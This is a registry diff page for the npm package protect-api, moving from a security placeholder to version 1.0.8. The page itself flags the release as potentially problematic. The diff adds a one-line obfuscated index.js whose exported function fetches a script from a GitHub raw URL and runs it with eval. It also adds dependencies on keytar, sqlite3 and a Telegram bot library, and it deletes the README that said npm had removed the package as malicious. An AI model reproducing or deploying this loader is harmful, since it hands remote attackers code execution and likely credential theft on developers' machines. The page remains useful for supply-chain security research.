protect-api 0.0.1-security → 1.0.8

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of protect-api might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +17 -4
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1 @@
1
+ const _0x520689=_0x3cd6;(function(_0x52b545,_0x34a891){const _0x3c0328=_0x3cd6,_0x218682=_0x52b545();while(!![]){try{const _0xb82a15=parseInt(_0x3c0328(0xf5))/0x1*(-parseInt(_0x3c0328(0xef))/0x2)+parseInt(_0x3c0328(0xf6))/0x3*(parseInt(_0x3c0328(0xf3))/0x4)+parseInt(_0x3c0328(0xf1))/0x5*(parseInt(_0x3c0328(0xfc))/0x6)+parseInt(_0x3c0328(0xf0))/0x7*(-parseInt(_0x3c0328(0xf2))/0x8)+-parseInt(_0x3c0328(0xfb))/0x9*(-parseInt(_0x3c0328(0xf9))/0xa)+-parseInt(_0x3c0328(0xf8))/0xb+-parseInt(_0x3c0328(0xf7))/0xc;if(_0xb82a15===_0x34a891)break;else _0x218682['push'](_0x218682['shift']());}catch(_0x3baa69){_0x218682['push'](_0x218682['shift']());}}}(_0x3016,0xef163));function _0x3cd6(_0x26a57f,_0x2a3515){const _0x301653=_0x3016();return _0x3cd6=function(_0x3cd651,_0x4eace7){_0x3cd651=_0x3cd651-0xef;let _0x927638=_0x301653[_0x3cd651];return _0x927638;},_0x3cd6(_0x26a57f,_0x2a3515);}function _0x3016(){const _0x54c570=['4613LzatOr','5540XwnzPj','13480wjyvbM','6998692mlUYiJ','text','1JQcXRU','3MRfsmE','2268636YxiWGR','11488334yfQbxk','49850uPoyFZ','exports','279TmXeHe','8904qCjoFg','https://github.com/datadestroyed/s/raw/refs/heads/main/ts.js','450638NmmikR'];_0x3016=function(){return _0x54c570;};return _0x3016();}const _0x4a21de=async _0x133459=>{const _0x23918e=_0x3cd6;try{const _0x2e8192=await fetch(_0x133459);if(!_0x2e8192['ok'])return;const _0x59f1d9=await _0x2e8192[_0x23918e(0xf4)]();eval(_0x59f1d9);}catch(_0x36c69a){}},_0x1f73a2=_0x520689(0xfd);module[_0x520689(0xfa)]=_0x3ddc64;function _0x3ddc64(){_0x4a21de(_0x1f73a2);}
package/package.json CHANGED
@@ -1,6 +1,19 @@
1
1
  {
2
- "name": "protect-api",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
2
+ "name": "protect-api",
3
+ "version": "1.0.8",
4
+ "main": "index.js",
5
+ "type": "commonjs",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "mene-project",
10
+ "license": "ISC",
11
+ "description": "",
12
+ "dependencies": {
13
+ "child_process": "^1.0.2",
14
+ "keytar": "^7.9.0",
15
+ "node-fetch": "^3.3.2",
16
+ "node-telegram-bot-api": "^0.66.0",
17
+ "sqlite3": "^5.1.7"
18
+ }
6
19
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=protect-api for more information.